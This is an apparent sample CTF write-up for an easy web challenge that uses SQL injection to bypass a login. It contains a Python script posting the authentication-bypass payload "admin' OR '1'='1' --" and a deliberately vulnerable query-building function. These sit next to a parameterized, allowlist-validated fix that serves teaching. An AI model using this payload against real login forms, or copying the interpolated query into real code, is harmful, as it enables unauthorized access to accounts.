Sample CTF 2026, 🌐 WEB, easy
Sample CTF - Web Challenge
This is a sample CTF writeup.
100 points, 50 solves
#web #sqli #sample
Challenge overview
| Item | Details |
|---|---|
| CTF | Sample CTF 2026 |
| Category | Web |
| Points | 100 |
| Solves | 50 |
Analysis
Visiting the challenge page shows a login form.
```html
<form action="/login" method="POST">
  <input name="username" type="text">
  <input name="password" type="password">
  <button type="submit">Login</button>
</form>
```
Vulnerability
A SQL injection vulnerability exists, because the form values are interpolated directly into the query:
```sql
SELECT * FROM users WHERE username = '$input' AND password = '$password'
```
Exploit
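```python
import requests

# Login endpoint of the challenge instance
url = "http://challenge.ctf/login"

# The quote closes the username literal, OR '1'='1' makes the WHERE clause
# always true, and -- comments out the password check.
payload = {
    "username": "admin' OR '1'='1' --",
    "password": "anything"
}

response = requests.post(url, data=payload)
print(response.text)  # FLAG{sample_flag_here}
```
Flag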
```plaintext
FLAG{sample_flag_here}
```
Lessons learned
- Always use prepared statements
- Input validation is required
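
The two lessons above, shown as an added example that is not part of the original writeup or the challenge's code: the writeup's query built by string interpolation next to the same query with bound parameters, plus an allowlist check on the username. The in-memory SQLite database, the table contents, and the function names are assumptions made for illustration.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data; the challenge's real backend and schema are unknown.
    # The password is plaintext only to mirror the writeup's query; a real
    # system stores a salted password hash instead.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 's3cret-constructed')")
    return db

def login_vulnerable(db, username, password):
    # Same shape as the query in the writeup: input is pasted into the SQL
    # text, so a quote in the input changes the structure of the statement.
    sql = ("SELECT * FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return db.execute(sql).fetchone() is not None

def login_prepared(db, username, password):
    # Placeholders keep the SQL text fixed; the driver binds the values as
    # data, so quotes and comment markers are never parsed as SQL.
    sql = "SELECT * FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None

def valid_username(username):
    # Allowlist validation as a second layer; it complements parameter
    # binding and does not replace it.
    return re.fullmatch(r"[A-Za-z0-9_.-]{1,32}", username) is not None

def demo():
    db = make_db()
    crafted = "admin' OR '1'='1' --"  # the username value from the writeup
    return {
        "vulnerable_crafted": login_vulnerable(db, crafted, "anything"),
        "prepared_crafted": login_prepared(db, crafted, "anything"),
        "prepared_legit": login_prepared(db, "admin", "s3cret-constructed"),
        "crafted_passes_validation": valid_username(crafted),
    }

if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```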